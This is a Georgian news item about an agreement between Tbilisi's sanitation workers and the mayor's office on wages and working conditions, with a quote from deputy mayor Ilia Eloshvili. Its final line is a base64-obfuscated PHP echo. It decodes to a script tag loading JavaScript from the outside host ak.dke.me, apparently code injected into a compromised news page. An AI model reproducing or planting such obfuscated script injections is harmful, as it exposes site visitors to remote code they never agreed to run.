celsiusi
ავერსი საქკაბელი
დასუფთავების სამსახურის თანამშრომლებსა და მერიას შორის შეთანხმება შედგა. "თბილსერვის ჯგუფისა" და პროფკავშირების მიერ შედგენილ 7 პუნქტიან დოკუმენტზე მერია 6 პუნქტის შესახებ 2 კვირის ვადაში იმსჯელებს, ხოლო მე-7 პუნქტი, რაც ხელფასების მატებას გულისხმობს, იანვრიდან ამოქმედდება.
 
მერიის განცხადებით, სამუშაო ფორმებთან დაკავშირებული პრობლემები აღმოიფხვრება.
 
"დღევანდელი გასვლა ხაზებზე მოხდა ყველანაირი წინაპირობის და ულტიმატუმების გარეშე. ეს არის ჩვენთვის პრინციპულად მნიშვნელოვანი, რისთვისაც ჩვენ ძალიან მადლობლები ვართ თითოეული თანამშრომლის.
 
რაც შეეხება მათ მოთხოვნებს, ჩვენ განვიხილეთ მათი მოთხოვნები შინაარსობრივად, რიგი მათი მოთხოვნებისა, რომელიც წამოყენებული ჰქონდათ, ნაწილი უკვე შესრულებულია, დანარჩენი არის ძალიან ტექნიკური დეტალი გრაფიკთან დაკავშირებული. ამასთან შევთანხმდით, რომ 15 დღის განმავლობაში ჩვენ სამუშაო ჯგუფების რეჟიმში, ისევე როგორც ვაკეთებდით ამას ყოველთვის, დავჯდებით, განვიხილავთ და ერთად გადავწყვეტთ, ამ ტექნიკური საკითხებიდან რომელი არის მისაღები და რომელი არა,“ - ამბობს თბილისის მერის მოადგილე ილია ელოშვილი.
1318
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");